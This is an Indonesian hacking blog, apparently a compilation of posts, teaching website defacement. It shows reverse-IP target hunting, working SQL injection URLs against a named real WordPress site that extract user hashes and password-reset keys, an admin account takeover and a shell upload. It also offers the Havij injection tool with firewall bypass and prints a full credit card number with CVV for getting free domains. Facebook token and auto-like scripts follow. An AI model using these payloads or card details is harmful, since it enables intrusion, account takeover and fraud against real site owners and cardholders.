Cara Hack atau Deface Web dengan BING ( Reverse Ip )

Salam kawan Googlemedianews, pada hari ini saya akan share kepada kawan
Metode Men-Hack Website dengan Reverse Ip.

Cara Hack Target Dengan Metode Reverse Ip membutuhkan sedikit waktu.
Pertama anda perlu target, misalkan http://herchcovitch.uol.com.br/. Maka untuk men-reverse Ip anda sekarang perlu ping target Anda seperti ini >> Buka CMD => http://herchcovitch.uol.com.br/


Versi 1. : Menggunakan CMD

1.Pertama Anda Harus Mencari Suatu Website Di Google.co.id atau bing.com Liat contohnnya

2. Setelah kita dapat target  POC: http://herchcovitch.uol.com.br langsung kita Ping mengunakan CMD

Quote:Pinging http://herchcovitch.uol.com.br/ [200.147.0.120] with 32 bytes of data:

dan ambil IP nya 200.147.0.120

3. Kemudian buka bing.com paste kode di bawah ini: Dan tulis dorknnya ip:200.147.0.120 php?id=

Versi 2  : Menggunakan http://www.yougetsignal.com/tools/web-sites-on-web-server/

1 .atau ambil IP nya paste ke link di bawah untuk melihat web yg satu server:

1. POC WEBSITENNYA

2.  Hasilnnya adalah 200.147.0.120 IP Dari Website http://herchcovitch.uol.com.br/

3. Setelah Itu Kita Buka DISINI Dan Search Menggunakan Dork ip:200.147.0.120 php?id=

 4. Disini Saya Memilih Website http://casadachris.uol.com.br/faca_materia.php?id=36  Sebagai Contoh

5. Selesai ^_^ Setelah Kita Dapat Websitennya Kita Inject Menggunakan SQLI,SQLMAP,Havj,Bactrack5 DLL


Editor : Aldy Freestyle ,from blog http://googlemedianewws.blogspot.com

Thanks For Tutorial : Forum Aceh Cyber Team :)


disana nanti akan terlihat website yang banyak dalam satu host/server dengan IP/WEbsite di atas.
Sekarang periksa semua situs satu per satu untuk menginjeksi sql injection.
Jika Anda mendapat rentan terhadap sql injection di website tsb, langsung saja mengupload shell, dan lakukan symlink



Semoga bermanfaat.

Cara Hack atau Deface Wordpress Dengan Mudah

Hy kawan AldyPro semua, disini saya akan menunjukkan kepada kawan semua bagaimana cara hack situs wordpress tanpa harus men-crak hash MD5.. Ok langsung saja kawan.

sekarang ini masih bekerja dengan semua exploits sqli wordpress yang ada di salah satu tema atau plugin ..

Perlu untuk diingat:
Anda tidak dapat memanfaatkan di versi terbaru dari wordpress selain versi 3.4.2 yang dirilis pada 6 September 2012.

BARU >> HACK WORDPRESS TERBARU 2017

sekarang masih banyak situs di luar sana yang belum diperbarui. semua versi sebelumnya dapat dieksploitasi dengan menggunakan metode ini ..

Jadi.. mari kita mulai ..

Hal yang perlu anda tahu.

1) setiap wordpress perlu dork sqli.. (kamu bisa mendapatkannya di exploit-db.com)
2) pengetahuan sqli .. (saya tidak membahas nya di thread ini coz ini bukan tentang sqli)

1) Dork Saya gunakan disini
Ada beberapa eksploitasi sqli di plugin yang berbeda dan tema wordpress. Saya gunakan Exploit salah satu plugin yang disebut Wp-FacebookConnect.. dan dork google yang saya gunakan adalah ..

Code:

inurl:"/?fbconnect_action=myhome"

sekarang paste kode ini di google.com (salah satu teman terbaik saya)
dan kamu akan melihat banyak situs yang rentan terhadapat Sql, tetapi dulu, kemungkinan sekarang sudah banyak di upgrade ke versi baru, terngantung si punya WP ...

2) sekarang yang saya gunakan untuk target di sini adalah

Code:

http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2

di sini parameter userid rentan terhadap sqli ..
jadi mari kita lihat apa yang bisa kita dapatkan dari database ..
Saya akan mengubah URL di atas menjadi seperti ini

Code:

http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email) ​​,7,8,9,10,11,12+from+wp_users--

sekarang kamu dapat melihat saya mendapat username dengan id email ..


sekarang saya mengubah URL di atas menjadi seperti ini ..

Code:

http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass), ​​7,8,9,10,11,12+from+wp_users--

Maka saya akan mendapatkan user name dan password yang masih hashed MD5..


(Perlu dicatat di sini .. saya menggunakan concat sini .. kamu juga dapat menggunakan group_concat untuk mendapatkan semua User (Perlu pengetahuan anda untuk belajar cara menggunakan sqli))

sekarang .. kita semua tahu bahwa kategori hash wordpress MD5 (wordpress) berbeda dari MD5 yang lain nya dan sangat sederhana, kalau yang WP sangat sulit untuk retak ..

tetapi jika kamu kreatif.. kamu harus berpikir keluar dari kotak tsb untuk mendapat cara supaya bisa memecahkan nya..

jadi sekarang ikuti langkah-langkah di bawah untuk memecahkan nya..

a) pergi ke halaman login dari situs wordpress .. dalam kasus saya ini seperti di bawah..

Code:

http://masaru.ikeda.me/wp-login.php

b) klik pada Lost your password?


c) sekarang wordpress akan meminta saya untuk username Or email .. untuk me-reset password .. dalam kasus saya ini adalah username nya 'masaru' bisa anda lihat di atas tadi, username nya "masaru" Bukan?.. jadi lanjutkan dan masukkan username ..


d) sekarang lihat apa yang di bilang di halam tsb.. "Check your e-mail for the confirmation link ("Periksa e-mail untuk link konfirmasi.")"


e) sekarang wordpress akan mengirimkan kunci aktivasi ke alamat email dari pengguna tadi "masaru" tentu nya ke email dia.. dan menetapkan nilai dari kunci aktivasi dalam basis data.. apa yang harus kita lakukan untuk mendapatkan aktivasi kunci tadi?

f) jadi sekarang saya akan mengubah URL saya ini .. untuk mendapatkan kunci aktivasi ..

Code:

http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa ​​tion_key),7,8,9,10,11,12+from+wp_users--

dan kita dapat melihat .. kita punya kunci aktivasi di sini .. kita harus mencatat itu untuk menggunakan di suatu tempat nanti..


g) Sekarang .. yang harus kita lakukan adalah .. tanpa pergi ke alamat email untuk me-reset password .. kita hanya menambahkan URL ini saja maka nanti akan aktif dengan sendiri nya dan kita langsung di beri akses untuk mengubah password baru..

Code:

wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

dan saya akan menggantikan KEYHERE dengan kunci aktivasi kita simpan tadi.. dan juga dengan USERNAME dengan username yang dalam kasus saya adalah 'Masaru' .. jadi URL di atas tadi akan menjadi seperti di bawah ini ..

Code:

http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru

dan lihat nanti.. wordpress akan meminta kamu untuk membuat password baru ubah lah seperti yang anda ingin kan di page tsb


dan sekarang pergi ke halaman login lagi .. dan mencoba password baru dan anda mem-punya akses ke panel Wordpress..


Dan setelah itu apa yang harus saya lakukan?
1. Pertama anda harus mempunyai satu Shell, kalau belum punya, silahkan download disini.

2. Upload Shell tersebut dan bersenang"lah di dalam, Kalau belum tahu cara meng-upload shell nya bisa anda lihat Disini sudah saya post treads nya dgn Video

Semoga bermanfaat buat kawan semua

Note: Saya tidak menganjurkan buat anda untuk mempraktekkan hal seperti di atas, jika ada kerusakan web orang lain maka tanggung jawab pribadi anda masing-masing jangan bawa" nama saya ok




Credits By : Forum ACT Crew

Havij V1.16 Pro Portable

Havij V1.16 Pro Portable



Features:
1. Supported Databases with injection methods
2. Multi-Thread
3. HTTPS Support
4. Proxy support
5. Automatic database detection
6. Automatic type detection (string or integer)
7. Automatic keyword detection (finding difference between the positive and negative response)
8. Automatic all parameter scan
9. Trying different injection syntaxes
10. Options for replacing space by /**/,+,... against IDS or filters
11. Avoid using strings (magic_quotes similar filters bypass)
12. Manual injection syntax support
13. Manual queries with result
14. Bypassing illegal union
15. Full customizable http headers (like referer,user agent and ...)
16. Load cookie from site for authentication
17. Http Basic and Digest authentication
18. Injecting URL rewrite pages
19. Bypassing mod_security web application firewall and similar firewalls
20. Bypassing WebKnight web application firewall and similar firewalls
21. Real time result
22. Guessing tables and columns in mysql

And 20 more features are present in it :p

Download : Here
Password : www.aldyfreestyle.com

VPN Free Trial 2013 Kepard

Aku mau share VPN Kepard Free Trial  :D Lumayan Trialnya itu 30hari . Bisa nambah speed koneksi lagi ,mantap kan :D langsung aja nih :)

Server Kepard :

• AS
• Inggris
• Jerman
• Kanada
• Belanda

 

Selain itu, ada beberapa alamat IP di setiap server yg memungkinkan setiap user untuk memilih alamat IP tersebut. Kepard VPN mendukung semua tiga protokol utama VPN:

1. OpenVPN
2. L2TP
3. PPTP

Semua account Kepard VPN fitur unlimited , kecepatan tidak terbatas dan bahkan memungkinkan torrents dan download P2P. Kalian juga diperbolehkan untuk mengakses layanan Kepard yang bersamaan pada 2 komputer. Kepard VPN menawarkan hingga 256 bit enkripsi, dan bandwidth tidak terbatas Kecepatan akan bervariasi tergantung pada seberapa dekat lokasi ke server yg terhubung :p

Download nya disini KEPARD

Domain Intuit Gratis 2013

JANGAN DIPERJUAL BELIKAN-
UTAMAKAN SHARING :) NO PELIT
Mungkin ada yg lagi butuh domain .com.net.org.biz.name.info :) baca dokumen ini aja :D

 

1. pertama ke sini :p
2. http://www.homestead.com/~site/jws/googleSignupReducedSubmit.action
3. isi semua data" (emailnya ngasal gpp ,yg penting inget)
4. ceklist "I accept the following" dan "I would like to receive from Google"
5. Langsung continue> aja :)
6. ke bagian "domain" whois dlu ,kalo udh bisa ,get domain :)
7. nanti ke sini ,isi kaya gni http://prntscr.com/t7dsh ,submit aja
8. lanjut ke sini http://prntscr.com/t7dz5 ,"Domain Privacy" JANGAN DI CENTANG  . Centang  "I agree to the Terms of Service" ,submit
9. isi data" yg lengkap :)

Credit Card :
Type : Visa
4447962191113806 (VISA)
06 / 2014 (bulan/tahun)
514(CVV)

NB : -JANGAN DIPERJUAL BELIKAN-

Smoga Bermanfaat :*
Aldy Freestyle

Wall Cleaner Groups Facebook 2013

Hello guys,
Biarpun sudah banyak yang share tentang Cleaner Spammer dengan google script, tp gpp lah saya posting disini... orang ini blog saya.. wkkwkwk..

Caranya sama aja seperti yang lain kalian buka dulu Script Google nya Script Google

token:"AAAAAByajaysBAM5Gp0r", = Akses Token

idGroup:"268425763266864", = ID_Grup yang dibersihkan

limitnya:100, = Limit pencarian Feed

antiUserPost:new RegExp("(100004398162811)","gi"), = ID_User facebook yang tidak diijinkan posting.

antiUserCom:new RegExp("(100003767072xx|100004579203xxx)","gi"), = Id_User yang tidak diijinkan berkomentar split dengan (,) koma.

antiKata:new RegExp("(http:|subscribe|www.|test|likes|autolike)","gi"), = Kata" yang akan dihapus.
antiAplikeseun:new RegExp("(49340319393|131732509879|2231777543|104018109673165|30713015083|116042411741519)","gi"), = Aplikasi yang akan dihapus. (bisa kamu tambahin sendiri)

Oke sekian dulu saya posting. kamu bisa lihat scriptnya Disini. :D

Sumber : adilla

Script Jempol ke Groups

Script ini akan memilih salah satu "access_token" secara "acak" dari robot.kumpulanTokens dan juga memilih secara acak salah satu "ID Group" dari robot.kumpulanIdGroups.

Untuk "Liking" Post atau Comment pada suatu Group, si pemegang "access_token" tidak perlu menjadi member dari group tersebut asalkan privacy group di set ke Public.

Script ini akan melakukan "scanning" pada feed dari ID Group dengan access_token terpilih, graph.facebook.com/"+robot.idGroupSekarang+"/feed dengan "scan limit" robot.limitPencarian.

(ID Group bisa juga diganti sama ID Profile)

Jika ditemukan feeds, script akan melakukan "pengecekan" apakah post pada feeds tersebut "sudah di Like?", jika belum maka langsung lah di Like, tapi kalo udah akan di check "apakah ada comments" pada post tersebut, jika ada apakah "sudah di Like?", jika belom ya udah di Like aja atuh >_< mau ngapain lagi emangnya ini teh hadeuh..

Scriptnya bisa dilihat di Google Script Collections 

Sumber : adilla 

Auto Like No Token

Autolike Ini Sudah Tidak Work ,dikarenakan pihak facebook sudah memperbaiki atau memperbaharui token token user facebook .
Terima Kasih atas kunjungannya :)

Subscribe Developer

Your Status ID:

Your Status ID Again:

-10

Sedang mengirim like ke status mu
Mohon tunggu

Suksess!!
Jangan lupa subscribe me ya.. :D